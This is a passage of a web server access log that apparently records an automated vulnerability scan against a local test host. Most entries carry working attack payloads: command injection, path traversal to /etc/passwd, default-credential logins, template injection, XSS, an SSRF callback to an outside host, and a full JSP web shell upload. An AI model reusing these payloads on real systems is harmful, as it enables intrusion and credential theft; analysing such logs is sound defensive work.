+0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://ca2tuc8smpv1g2s80ca05gii61zsjzsbi.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2229N5EhpwsLNxGiEwq4PhHVPMCob.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%\x0D\x0Aif (request.getParameter(\x22cmd\x22) != null) {\x0D\x0A out.println(\x22Command: \x22 + request.getParameter(\x22cmd\x22) + \x22
\x22);\x0D\x0A Process p = Runtime.getRuntime().exec(request.getParameter(\x22cmd\x22));\x0D\x0A OutputStream os = p.getOutputStream();\x0D\x0A InputStream in = p.getInputStream();\x0D\x0A DataInputStream dis = new DataInputStream(in);\x0D\x0A String disr = dis.readLine();\x0D\x0A while ( disr != null ) {\x0D\x0A out.println(disr);\x0D\x0A disr = dis.readLine();\x0D\x0A }\x0D\x0A }\x0D\x0A%>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /poc.jsp/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"{\x0D\x0A \x22user\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/requestreset HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5EhpwsLNxGiEwq4PhHVPMCob.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} 